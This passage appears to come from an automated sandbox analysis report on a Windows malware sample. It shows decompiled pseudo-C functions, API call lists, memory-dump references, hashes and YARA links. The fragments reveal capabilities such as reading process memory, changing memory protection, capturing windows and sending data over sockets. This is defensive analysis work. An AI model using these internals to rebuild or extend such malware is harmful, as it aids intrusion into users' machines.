							if(__rax != 0xffffffff) {
								r9d = 0;
								r8d = 0;
								if(SetFilePointer(??, ??, ??, ??) == _t27) {
									_v72 = _t38;
									_t10 = _t38 + 4; // 0x4
									r8d = _t10;
									if(ReadFile(??, ??, ??, ??, ??) != 0 && _a24 == 4) {
										_t38 = _t38 + _t52;
									}
								}
								_t16 = CloseHandle();
							}
						}
					}
					E00C61E84();
					goto L10;
				}
			}

0x00c64b0c
0x00c64b0c
0x00c64b0c
0x00c64b18
0x00c64b1b
0x00c64b25
0x00c64b2a
0x00c64b2c
0x00c64bf3
0x00c64c02
0x00c64b32
0x00c64b38
0x00c64b40
0x00c64b4d
0x00c64b52
0x00c64b56
0x00c64b61
0x00c64b61
0x00c64b65
0x00c64b6a
0x00c64b6d
0x00c64b7a
0x00c64b82
0x00c64b8f
0x00c64b91
0x00c64b94
0x00c64ba4
0x00c64bae
0x00c64bb3
0x00c64bb3
0x00c64bca
0x00c64bdd
0x00c64bdd
0x00c64bca
0x00c64be3
0x00c64be3
0x00c64b8f
0x00c64b56
0x00c64bee
0x00000000
0x00c64bee

APIs

Part of subcall function 00C64588: GetModuleFileNameA.KERNEL32(?,?,0000001B,00C6258A,?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C645C5

Part of subcall function 00C6412C: lstrcmpA.KERNEL32(?,00000001,00000000,00C62DED,?,?,?,?,00000001,00000000,?,00C62D71,?,?,00000000,00000000), ref: 00C6418B

CreateFileA.KERNEL32 ref: 00C64B82
SetFilePointer.KERNEL32 ref: 00C64B9C
ReadFile.KERNEL32 ref: 00C64BC2
CloseHandle.KERNEL32 ref: 00C64BE3

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CloseCreateHandleModuleNamePointerReadlstrcmp
String ID:
API String ID: 3110218675-0
Opcode ID: 9660b1a0b00316994f9b77e30b835ac6c3c7e12960be0111e568e41eb0c5f8c6
Instruction ID: 6db5b1c3f6e2b891d2c167cbafc54ec517a016799400c7c8687a8d5221b8adca
Opcode Fuzzy Hash: 9660b1a0b00316994f9b77e30b835ac6c3c7e12960be0111e568e41eb0c5f8c6
Instruction Fuzzy Hash: 5721A73630869183EB349B25F994B5A7255FBC5BD4F488221DE5947F58DF38C94ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 00C6BE28, Relevance: 6.1, APIs: 4, Instructions: 63networkCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00C6BE60
memcpy.NTDLL ref: 00C6BE7D
select.WS2_32 ref: 00C6BEB7
send.WS2_32 ref: 00C6BED5

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memcpymemsetselectsend
String ID:
API String ID: 3107527136-0
Opcode ID: 3b67da3546080e9a876a68d2e648cb2e100cbd4a52bf21289696156c7a2d422c
Instruction ID: d3da539f159321b8ce752a47684a30ace9c163fd3b326d3742c377837cb8df87
Opcode Fuzzy Hash: 3b67da3546080e9a876a68d2e648cb2e100cbd4a52bf21289696156c7a2d422c
Instruction Fuzzy Hash: B121A432310B4086D730DF6695C47A97755E788BE0F194225EF6A47B94CF39C5468740

Uniqueness

Uniqueness Score: -1.00%

Function 00C68C8C, Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E00C68C8C(signed int __ebx, signed int __ebp, long long __rbx, signed long long* __rcx, void* __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16) {
				void* _v40;
				long _t18;
				void* _t28;
				signed int _t36;
				long long _t39;
				long long _t41;
				signed long long* _t50;
				void* _t52;
				void* _t55;
				void* _t59;
				void* _t60;

				_t59 = __r9;
				_t53 = __rbp;
				_t52 = __rsi;
				_t42 = __rbx;
				_t60 = _t55;
				 *((long long*)(_t60 + 8)) = __rbx;
				 *((long long*)(_t60 + 0x10)) = __rbp;
				_t50 = __rcx;
				_t39 =  *0xc956a0; // 0x1b8
				asm("sbb ebx, ebx");
				 *((long long*)(_t60 - 0x28)) = _t39;
				 *((long long*)(_t60 - 0x20)) =  *((intOrPtr*)(__rcx + 8));
				_t36 = __ebp | 0xffffffff;
				_t41 =  *((intOrPtr*)(__rcx + 0x10));
				_t28 = (__ebx & 0x000003e9) + _t36;
				 *((long long*)(_t60 - 0x18)) = _t41;
				while(1) {
					r8d = 0;
					r9d = _t28;
					_t18 = WaitForMultipleObjects(??, ??, ??, ??);
					if(_t18 == 0) {
						break;
					}
					if(_t18 == 1) {
						E00C78C54(_t50);
						r8d = GetCurrentProcessId();
						OpenProcess(??, ??, ??);
						if(_t41 != 0) {
							TerminateProcess();
						}
						L6:
						return 0;
					} else {
						if(_t18 == 0x102) {
							_t41 =  *((intOrPtr*)(_t50 + 0x20));
							E00C7E7C0( *((intOrPtr*)(_t41 + 0x15c)),  *((intOrPtr*)(_t41 + 0x158)), _t42, _t52, _t53, _t59);
							_t28 =  !=  ? _t36 : _t28;
						}
						continue;
					}
				}
				E00C78C54(_t50);
				goto L6;
			}

0x00c68c8c
0x00c68c8c
0x00c68c8c
0x00c68c8c
0x00c68c8c
0x00c68c8f
0x00c68c93
0x00c68ca2
0x00c68ca7
0x00c68cae
0x00c68cb0
0x00c68cbe
0x00c68cc2
0x00c68cc5
0x00c68cc9
0x00c68ccb
0x00c68cf7
0x00c68cf7
0x00c68cff
0x00c68d06
0x00c68d0e
0x00000000
0x00000000
0x00c68cd4
0x00c68d2d
0x00c68d3a
0x00c68d40
0x00c68d49
0x00c68d50
0x00c68d50
0x00c68d18
0x00c68d29
0x00c68cd6
0x00c68cdb
0x00c68cdd
0x00c68ced
0x00c68cf4
0x00c68cf4
0x00000000
0x00c68cdb
0x00c68cd4
0x00c68d13
0x00000000

APIs

WaitForMultipleObjects.KERNEL32 ref: 00C68D06

Part of subcall function 00C78C54: UnmapViewOfFile.KERNEL32(?,?,?,00C78B4B), ref: 00C78C66
Part of subcall function 00C78C54: CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78C7A
Part of subcall function 00C78C54: UnmapViewOfFile.KERNEL32(?,?,?,00C78B4B), ref: 00C78C8E
Part of subcall function 00C78C54: CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78CA2
Part of subcall function 00C78C54: FindCloseChangeNotification.KERNELBASE(?,?,?,00C78B4B), ref: 00C78CB6
Part of subcall function 00C78C54: CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78CC9
Part of subcall function 00C78C54: CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78CDC

GetCurrentProcessId.KERNEL32 ref: 00C68D32
OpenProcess.KERNEL32 ref: 00C68D40
TerminateProcess.KERNEL32 ref: 00C68D50

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Close$Handle$Process$FileUnmapView$ChangeCurrentFindMultipleNotificationObjectsOpenTerminateWait
String ID:
API String ID: 1069760962-0
Opcode ID: 068d6b873d512494b86f9f9cae334f2dd87fc5d8b7665fcddc374f6f30138a66
Instruction ID: c0f2c006c5d16be7991f790b1944c3e4507870029632a4ed87690548e7998b21
Opcode Fuzzy Hash: 068d6b873d512494b86f9f9cae334f2dd87fc5d8b7665fcddc374f6f30138a66
Instruction Fuzzy Hash: 89114A32305B4486EB24DF2AE888B6973A1FB48B94F658635CA5D87760EF34C949C714

Uniqueness

Uniqueness Score: -1.00%

Function 00C7BDAC, Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32 ref: 00C7BDD4
OpenProcess.KERNEL32 ref: 00C7BDEF
StrRChrA.SHLWAPI ref: 00C7BE1C
CloseHandle.KERNEL32 ref: 00C7BE3F

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$CloseHandleOpenThreadWindow
String ID:
API String ID: 1586161098-0
Opcode ID: cf1b3af0343802f2d6bfc0a4cdab683a591a9bcb506045d5d7b2e04c60943b8c
Instruction ID: 00b38b932e5e01779dbcf076e95774d9ff3659c3a5c7168acca30fd179aed8ef
Opcode Fuzzy Hash: cf1b3af0343802f2d6bfc0a4cdab683a591a9bcb506045d5d7b2e04c60943b8c
Instruction Fuzzy Hash: 6D118621301B0486EB25DF6BA444769B7A1A789FD0F49C0389F1D43B14EF78CD46C700

Uniqueness

Uniqueness Score: -1.00%

Function 00C7CECC, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00C7CECC(void* __ecx, void* __eflags, long long __rax, long long __rbx, long long __rcx, long long __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				long long _v40;
				char _v104;
				long long _v120;
				void* __rdi;
				void* _t19;
				struct HWND__* _t20;
				void* _t22;
				void* _t27;
				long long _t36;
				long long _t38;
				long long _t50;
				intOrPtr _t54;
				long long _t56;

				_t58 = __rbp;
				_t36 = __rax;
				_t27 = __ecx;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t54 =  *((intOrPtr*)(__rdx + 0x40));
				_t56 = __rdx;
				_t38 = __rcx;
				do {
					_t50 = _t38;
					_t19 = E00C7C050(_t36, _t38, _t54 + 0x88, _t50, _t56);
					_t33 = _t19;
					if(_t19 != 0) {
						_t7 = _t50 + 0x60; // 0x60
						r8d = _t7;
						memset(??, ??, ??);
						_v120 = _t56;
						_t22 = E00C7CA1C(_t27, 0, _t33, _t38, _t54, _t38, _t54, _t56,  *((intOrPtr*)(_t54 + 0x720)),  *((intOrPtr*)(_t54 + 0x728)));
						_t34 = _t22;
						if(_t22 != 0) {
							E00C7CFB4(_t36, _t38, _t38,  &_v104, _t56, _t56);
							asm("movups xmm0, [esi+0x48]");
							_t36 =  *((intOrPtr*)(_t56 + 0x40));
							_v40 = _t36;
							asm("movdqu [esp+0x78], xmm0");
							GetWindow(??, ??);
							GetWindow(??, ??);
							E00C7CECC(_t27, _t34, _t36, _t38, _t36,  &_v104, _t56, _t58);
						}
					}
					_t20 = GetWindow();
					_t38 = _t36;
				} while (_t36 != 0);
				return _t20;
			}

0x00c7cecc
0x00c7cecc
0x00c7cecc
0x00c7cecc
0x00c7ced1
0x00c7ced6
0x00c7cee3
0x00c7cee7
0x00c7ceea
0x00c7ceed
0x00c7ceed
0x00c7cef7
0x00c7cefc
0x00c7cefe
0x00c7cf07
0x00c7cf07
0x00c7cf0b
0x00c7cf24
0x00c7cf29
0x00c7cf2e
0x00c7cf30
0x00c7cf3d
0x00c7cf42
0x00c7cf46
0x00c7cf52
0x00c7cf57
0x00c7cf5d
0x00c7cf6b
0x00c7cf79
0x00c7cf79
0x00c7cf30
0x00c7cf86
0x00c7cf8c
0x00c7cf8f
0x00c7cfb0

APIs

Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093

memset.NTDLL ref: 00C7CF0B

Part of subcall function 00C7CA1C: GetWindowInfo.USER32 ref: 00C7CA80
Part of subcall function 00C7CA1C: GetWindowTextA.USER32 ref: 00C7CAAC
Part of subcall function 00C7CA1C: ShowWindow.USER32 ref: 00C7CABB

Part of subcall function 00C7CFB4: GetWindowRect.USER32 ref: 00C7CFCC
Part of subcall function 00C7CFB4: GetWindowLongPtrA.USER32 ref: 00C7CFFD
Part of subcall function 00C7CFB4: GetScrollBarInfo.USER32 ref: 00C7D020
Part of subcall function 00C7CFB4: memcpy.NTDLL ref: 00C7D040
Part of subcall function 00C7CFB4: GetScrollBarInfo.USER32 ref: 00C7D052
Part of subcall function 00C7CFB4: memcpy.NTDLL ref: 00C7D072

GetWindow.USER32 ref: 00C7CF5D
GetWindow.USER32 ref: 00C7CF6B
GetWindow.USER32 ref: 00C7CF86

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$Info$Scrollmemcpy$AncestorLongRectShowTextmemset
String ID:
API String ID: 4134195742-0
Opcode ID: a8fafee3003e1ec9de8990617f7f79df9fa66096aba69bb4669c604bdbc2154a
Instruction ID: 8895a571fd462112c094258f51253c4e792f98bfc0e681a160fdfd228e1178da
Opcode Fuzzy Hash: a8fafee3003e1ec9de8990617f7f79df9fa66096aba69bb4669c604bdbc2154a
Instruction Fuzzy Hash: E011AF22704B8186EB14DB22E94079AB3A1F788BC0F589136EF9D43B19EF3CC955CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00C64C04, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 54
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00C64C04(void* __ecx, void* __edi, long long __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				void* _t19;
				void* _t24;
				long long _t27;
				long long _t40;
				long long _t42;
				intOrPtr* _t50;

				_t28 = __rbx;
				_t27 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t24 = r8d;
				_t50 = __rcx;
				_t19 = 8;
				_t25 = r8b & 0x00000010;
				if((r8b & 0x00000010) == 0) {
					E00C644C0();
					_t42 = _t27;
					L4:
					E00C61E70();
					_t40 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						__eflags = 0;
						r8d = 0x318;
						memset(??, ??, ??);
						_t7 = _t40 + 0x18; // 0x18
						 *((long long*)(_t40 + 8)) = _t42;
						 *((long long*)(_t40 + 0x10)) = _t7;
						lstrcpyA(??, ??);
						r8d = _t24;
						_t19 = E00C64CC8(_t27, _t28, _t50, _t40);
						E00C61E84();
					}
					L6:
					return _t19;
				}
				E00C64750(__ecx, _t24, _t25, __rbx,  *__rcx, "KERNEL32.DLL", __rsi, "LoadLibraryA");
				_t42 = _t27;
				if(_t27 != 0) {
					goto L4;
				}
				_t6 = _t27 + 2; // 0x2
				_t19 = _t6;
				goto L6;
			}

0x00c64c04
0x00c64c04
0x00c64c04
0x00c64c09
0x00c64c0e
0x00c64c1c
0x00c64c22
0x00c64c25
0x00c64c2a
0x00c64c2e
0x00c64c53
0x00c64c58
0x00c64c5b
0x00c64c60
0x00c64c65
0x00c64c68
0x00c64c6b
0x00c64c6d
0x00c64c6f
0x00c64c78
0x00c64c7d
0x00c64c81
0x00c64c88
0x00c64c8c
0x00c64c92
0x00c64ca3
0x00c64ca5
0x00c64ca5
0x00c64caa
0x00c64cc4
0x00c64cc4
0x00c64c41
0x00c64c46
0x00c64c4c
0x00000000
0x00000000
0x00c64c4e
0x00c64c4e
0x00000000

APIs

memset.NTDLL(00000000,00000000,00001644,00C61769), ref: 00C64C78
lstrcpyA.KERNEL32(00000000,00000000,00001644,00C61769), ref: 00C64C8C

Part of subcall function 00C64750: VirtualAlloc.KERNEL32(?,?,?,?,00000000,?,?,00000000,00001644,00C64C46,00000000,00000000,00001644,00C61769), ref: 00C647A2
Part of subcall function 00C64750: ReadProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,00001644,00C64C46,00000000,00000000,00001644,00C61769), ref: 00C647DD
Part of subcall function 00C64750: VirtualFree.KERNEL32(?,?,?,?,00000000,?,?,00000000,00001644,00C64C46,00000000,00000000,00001644,00C61769), ref: 00C6482E

Strings

KERNEL32.DLL, xrefs: 00C64C3A
LoadLibraryA, xrefs: 00C64C33

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Virtual$AllocFreeMemoryProcessReadlstrcpymemset
String ID: KERNEL32.DLL$LoadLibraryA
API String ID: 1877694828-1423781741
Opcode ID: 30229c1808a3c957cb11789524a799e5e44d2513da27a52ca03e06e737d0fd1f
Instruction ID: c1aeaa2ecbfbba484cc9a8745f1507f295c58d04ff87ab61b013009897c82b67
Opcode Fuzzy Hash: 30229c1808a3c957cb11789524a799e5e44d2513da27a52ca03e06e737d0fd1f
Instruction Fuzzy Hash: CB11C222301B5192EA28DB57E88431A7760FB89BC0F888425EE5C47B59EF39C9958344

Uniqueness

Uniqueness Score: -1.00%

Function 00C69DC0, Relevance: 6.1, APIs: 4, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00C69DE5
LeaveCriticalSection.KERNEL32 ref: 00C69E2A
SetWindowLongPtrA.USER32 ref: 00C69E4D
HeapFree.KERNEL32 ref: 00C69E66

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveLongWindow
String ID:
API String ID: 3319364134-0
Opcode ID: 06ba38139b972e601d3960d9e72826b1e112c79212c74b02d0b30622424208b2
Instruction ID: 0b315783060a83e8bc2723fd915a1fbedb372d988a5ddba15f1382d4229d42b0
Opcode Fuzzy Hash: 06ba38139b972e601d3960d9e72826b1e112c79212c74b02d0b30622424208b2
Instruction Fuzzy Hash: 3E117972205F40C2EB20CF26E88475973A8F788F94F998621EE5E43768DF39C995C340

Uniqueness

Uniqueness Score: -1.00%

Function 00C80324, Relevance: 6.0, APIs: 4, Instructions: 50
fileCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E00C80324(long long __rbx, signed int __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
				signed long long _v24;
				intOrPtr _v32;
				intOrPtr _v40;
				long _t20;
				long _t22;
				void* _t27;
				void* _t30;
				void* _t41;
				void* _t46;
				void* _t48;
				void* _t53;
				void* _t54;
				WCHAR* _t55;
				void* _t56;

				_t53 = __r9;
				_t43 = __rsi;
				_t30 = _t48;
				 *((long long*)(_t30 + 8)) = __rbx;
				 *((long long*)(_t30 + 0x10)) = __rbp;
				 *((long long*)(_t30 + 0x18)) = __rsi;
				 *((long long*)(_t30 + 0x20)) = __rdi;
				 *(_t30 - 0x18) =  *(_t30 - 0x18) & 0x00000000;
				_t27 = r9d;
				r9d = 0;
				 *((intOrPtr*)(_t30 - 0x20)) = 0x2000080;
				_t46 = __r8;
				 *((intOrPtr*)(_t30 - 0x28)) = 3;
				_t56 = __rdx;
				_t32 = __rcx;
				_t9 = _t53 + 7; // 0x7
				r8d = _t9;
				CreateFileW(_t55, ??, ??, ??, ??, ??);
				_t41 = _t30;
				if(_t30 != 0xffffffff) {
					L3:
					r9d = _t27;
					_t20 = E00C801BC(_t32, _t41, _t56, _t41, _t43, _t46, _t54);
					CloseHandle(??);
					_t22 = _t20;
				} else {
					_v24 = _v24 & 0x00000000;
					_t12 = _t30 + 8; // 0x8
					r8d = _t12;
					_v32 = 0x80;
					r9d = 0;
					_v40 = 3;
					CreateFileW(??, ??, ??, ??, ??, ??, ??);
					_t41 = _t30;
					if(_t30 != 0xffffffff) {
						goto L3;
					} else {
						_t22 = GetLastError();
					}
				}
				return _t22;
			}

0x00c80324
0x00c80324
0x00c80324
0x00c80327
0x00c8032b
0x00c8032f
0x00c80333
0x00c8033d
0x00c80342
0x00c80345
0x00c80348
0x00c8034f
0x00c80352
0x00c80359
0x00c8035c
0x00c80364
0x00c80364
0x00c80368
0x00c8036e
0x00c80375
0x00c803b3
0x00c803b3
0x00c803bf
0x00c803c9
0x00c803cf
0x00c80377
0x00c80377
0x00c8037d
0x00c8037d
0x00c80381
0x00c80389
0x00c80391
0x00c8039c
0x00c803a2
0x00c803a9
0x00000000
0x00c803ab
0x00c803ab
0x00c803ab
0x00c803a9
0x00c803eb

APIs

CreateFileW.KERNEL32 ref: 00C80368
CreateFileW.KERNEL32(?,?,?,?,?,?,?,00C8015C), ref: 00C8039C
GetLastError.KERNEL32(?,?,?,?,?,?,?,00C8015C), ref: 00C803AB
CloseHandle.KERNEL32 ref: 00C803C9

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile$CloseErrorHandleLast
String ID:
API String ID: 77722140-0
Opcode ID: d995f217c23a6de9f541f33c817ba5fb3a8da49f2974aa7b36971760cb2ed917
Instruction ID: 4d470787cbb37919d4ba644db32f81807b49c6a6ddc086b86bc92d723c1bf8ea
Opcode Fuzzy Hash: d995f217c23a6de9f541f33c817ba5fb3a8da49f2974aa7b36971760cb2ed917
Instruction Fuzzy Hash: 6311793270075086E7109B12BA587197A60F388FF8F548311DFA507BE4CF78C9498748

Uniqueness

Uniqueness Score: -1.00%

Function 00C7AAB8, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00C7AAC5
GetWindowRect.USER32 ref: 00C7AAD6
GetWindowRect.USER32 ref: 00C7AAE4
SetWindowPos.USER32 ref: 00C7AB48

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$Rect$Parent
String ID:
API String ID: 1036685349-0
Opcode ID: 32ec5ae3594d325a516dad10a414788f8aaecf9f3cbd10f83967aa533d646471
Instruction ID: cc263e7566a7bd1385cf05107213b17292a70d419412ed3853782bdab94e41dd
Opcode Fuzzy Hash: 32ec5ae3594d325a516dad10a414788f8aaecf9f3cbd10f83967aa533d646471
Instruction Fuzzy Hash: C4115A323245428BD714CF7DF945B0ABBA1F789B94F589224BB8483E98CE7CD0088F04

Uniqueness

Uniqueness Score: -1.00%

Function 00C6843C, Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000000,00C68648,?,?,?,00C61F88,?,?,?,00C6203D), ref: 00C6847D
VirtualProtect.KERNEL32(?,?,00000000,00C68648,?,?,?,00C61F88,?,?,?,00C6203D), ref: 00C68498
VirtualProtect.KERNEL32(?,?,00000000,00C68648,?,?,?,00C61F88,?,?,?,00C6203D), ref: 00C684BD
VirtualProtect.KERNEL32(?,?,00000000,00C68648,?,?,?,00C61F88,?,?,?,00C6203D), ref: 00C684DB

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3b3950b7e6807380c8a1aa00eb2f1c1b284069b620585972cc9102cffa1d9835
Instruction ID: 0ca7986cbc911ef5cbefd215adc0794a05d29a77f9176d1e95724fbb5a34192e
Opcode Fuzzy Hash: 3b3950b7e6807380c8a1aa00eb2f1c1b284069b620585972cc9102cffa1d9835
Instruction Fuzzy Hash: 4E111F36324A4197D764CF26E444B9D7321F788F84F589122EF5A07B68CF39D55ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 00C6A334, Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,00C61FF3), ref: 00C6A350
LeaveCriticalSection.KERNEL32(?,?,?,00C61FF3), ref: 00C6A38F
UnhookWindowsHookEx.USER32 ref: 00C6A3A3
HeapFree.KERNEL32(?,?,?,00C61FF3), ref: 00C6A3B5

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapHookLeaveUnhookWindows
String ID:
API String ID: 3224164451-0
Opcode ID: 7aaec8ab5d6258962b13d95244b3537d00b036593ed8ef02579c229995e19602
Instruction ID: 5a2d15dbaaa8c2f41ed2c127e6d1e3ab2e19cf0c546f185c2453eb253af6c3b1
Opcode Fuzzy Hash: 7aaec8ab5d6258962b13d95244b3537d00b036593ed8ef02579c229995e19602
Instruction Fuzzy Hash: D9113532604B40C2EB25CF52E8C472D73A1F794F90F989622DA5A53734CF38CA85CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00C7B6C4, Relevance: 6.0, APIs: 4, Instructions: 42threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C7B6D9
GetWindowThreadProcessId.USER32 ref: 00C7B6EE
AttachThreadInput.USER32 ref: 00C7B719
AttachThreadInput.USER32 ref: 00C7B737

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Thread$AttachInput$CurrentProcessWindow
String ID:
API String ID: 3335540525-0
Opcode ID: fe3b286768abf8f39a3f24d4c00ce798516d5af6e46ec10c843bcb2ce74cabd9
Instruction ID: 6c61dab9e3d60371689e16f23b0a064d34817f9bffde180751666edb6606fe63
Opcode Fuzzy Hash: fe3b286768abf8f39a3f24d4c00ce798516d5af6e46ec10c843bcb2ce74cabd9
Instruction Fuzzy Hash: D011613671068087E7188B21E588769B371F784B81F64C128DB2947B48DF39DD64CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00C7D384, Relevance: 6.0, APIs: 4, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

IsWindow.USER32 ref: 00C7D3AD
RedrawWindow.USER32 ref: 00C7D3C5
PrintWindow.USER32 ref: 00C7D3D4
Sleep.KERNEL32 ref: 00C7D3E0

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
